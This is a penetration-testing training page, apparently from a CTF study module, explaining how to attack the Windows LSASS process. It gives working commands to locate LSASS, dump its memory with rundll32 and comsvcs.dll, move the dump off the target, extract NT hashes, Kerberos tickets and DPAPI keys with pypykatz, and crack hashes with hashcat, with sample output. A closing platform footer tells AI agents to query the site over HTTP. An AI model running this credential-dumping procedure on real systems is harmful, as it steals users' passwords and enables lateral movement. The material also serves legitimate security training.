> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/windows-authentication-process/attacking-lsass.md).

# Attacking LSASS

### What is LSASS?

**LSASS** (Local Security Authority Subsystem Service) — `lsass.exe` — is a core Windows process responsible for all authentication on the system. It runs as `SYSTEM` and is the gatekeeper between a user and their session.

#### On every logon, LSASS:

* Caches credentials locally in memory
* Creates access tokens
* Enforces security policies
* Writes to Windows' Security event log

> **Why it matters for pentesters:** LSASS holds in-memory credentials for every active logon session. Dumping it gives you NT hashes, Kerberos tickets, and sometimes cleartext passwords — for every user currently logged in.

***

### Step 1 — Find the LSASS PID

Before dumping, identify the PID assigned to `lsass.exe`.

**From CMD:**

```cmd
tasklist /svc
```

Look for `lsass.exe` in the output (e.g. PID `672`, services: `KeyIso, SamSs, VaultSvc`).

**From PowerShell:**

```powershell
Get-Process lsass
```

PID is in the `Id` column.

***

### Step 2 — Dump LSASS Memory

Goal: create a `.dmp` file (memory snapshot) to exfil and parse offline. Offline analysis = no time pressure on target, full GPU cracking speed.

#### Method A — Task Manager (GUI required)

1. Open Task Manager → Processes tab
2. Right-click **Local Security Authority Process**
3. Select **Create dump file**
4. File saved to `%temp%\lsass.DMP`

#### Method B — rundll32 + comsvcs.dll (CLI, no GUI needed)

```powershell
rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dmp full
```

**Example with PID 672:**

```powershell
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full
```

**How it works:** `rundll32` calls an exported function from `comsvcs.dll`, which internally calls `MiniDumpWriteDump` to write the LSASS process memory to disk.

> **⚠️ AV Note:** Modern AV tools flag this method as malicious. AV bypass techniques are covered in a separate module.

***

### Step 3 — Transfer the Dump File

Move `lsass.dmp` from the target to your Linux attack host using file transfer methods from the File Transfers module (Python HTTP server, SMB, base64 encode/decode, etc.).

***

### Step 4 — Parse with Pypykatz

**Pypykatz** is Mimikatz rewritten in Python — runs natively on Linux without needing to touch the target again.

> Mimikatz itself is Windows-only. Pypykatz lets you work entirely offline from a dump file.

**Command:**

```bash
pypykatz lsa minidump /path/to/lsass.dmp
```

* `lsa` — specifies the LSA subsystem
* `minidump` — input format
* `/path/to/lsass.dmp` — your dump file

***

### Pypykatz Output — What to Look For

#### MSV (Microsoft Authentication Package)

```
== MSV ==
    Username: bob
    Domain: DESKTOP-33E7O54
    LM: NA
    NT: 64f12cddaa88057e06a81b54e73b949b
    SHA1: cba4e545b7ec918129725154b29f055e4cd5aea8
    DPAPI: NA
```

* LSA calls MSV to validate logons against the SAM database
* **NT hash** → crack with Hashcat or use directly in Pass-the-Hash
* LM is `NA` on modern systems (disabled by default since Vista)

***

#### WDIGEST

```
== WDIGEST ==
    username bob
    domainname DESKTOP-33E7O54
    password None
    password (hex)
```

* Legacy protocol enabled by default on **Windows XP – Windows 8** and **Server 2003 – Server 2012**
* LSASS caches WDIGEST credentials in **cleartext**
* Modern Windows: WDIGEST disabled → `password: None` is normal output
* If enabled on an old system → you may get the raw plaintext password directly

***

#### Kerberos

```
== Kerberos ==
    Username: bob
    Domain: DESKTOP-33E7O54
```

* Used for authentication in Active Directory domain environments
* LSASS caches: passwords, encryption keys (ekeys), tickets, PINs
* Extracted tickets → lateral movement across domain-joined systems without needing the password

***

#### DPAPI

```
== DPAPI ==
    luid 1354633
    key_guid 3e1d1091-b792-45df-ab8e-c66af044d69b
    masterkey e8bc2faf77e7bd1891c0e49f0dea9d447...
    sha1_masterkey 52e758b6120389898f7fae553ac8172b43221605
```

* **Data Protection API** — Windows mechanism for encrypting application secrets
* Protects: browser saved passwords, Wi-Fi credentials, RDP credentials, etc.
* LSASS holds the **masterkey** for logged-on users
* Extracted masterkey → decrypt all DPAPI-protected secrets on that machine
* Deep dive: Windows Privilege Escalation module

***

### Step 5 — Crack the NT Hash

NT hashes use **Hashcat mode 1000**.

```bash
sudo hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt
```

**Output:**

```
64f12cddaa88057e06a81b54e73b949b:Password1
```

***

### Quick Reference

| Hash / Data Type            | Hashcat Mode | Source            |
| --------------------------- | ------------ | ----------------- |
| NT hash                     | `-m 1000`    | MSV section       |
| NTLMv2 (challenge/response) | `-m 5600`    | Network capture   |
| LM hash                     | `-m 3000`    | SAM / old systems |

| Credential Type | Where Stored | What You Get                      |
| --------------- | ------------ | --------------------------------- |
| MSV             | LSASS memory | NT hash, SHA1 hash, SID           |
| WDIGEST         | LSASS memory | Cleartext password (old systems)  |
| Kerberos        | LSASS memory | Tickets, ekeys → lateral movement |
| DPAPI           | LSASS memory | Masterkey → decrypt app secrets   |

***

### Key points

* **LSASS vs SAM:** SAM = local hashes at rest on disk. LSASS = active session credentials in memory. Together they cover most local credential attack paths.
* **Why pypykatz over Mimikatz on target:** Mimikatz is Windows-only and running it directly on target is loud. Pypykatz parses the dump file offline from your Kali box.
* **NT hash mode is always `-m 1000`.** Don't confuse with NTLMv2 (`-m 5600`) captured from network traffic.
* **Offline = better.** Dumping and exfilling means no live hammering of the target, full cracking speed on your own hardware.
* **Multiple logon sessions are normal.** A single dump will show sessions for multiple users (including system accounts like `DWM-2`). Focus on user sessions for useful creds.
* **WDIGEST being empty (`None`) is expected** on modern systems — only interesting on legacy targets.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/windows-authentication-process/attacking-lsass.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
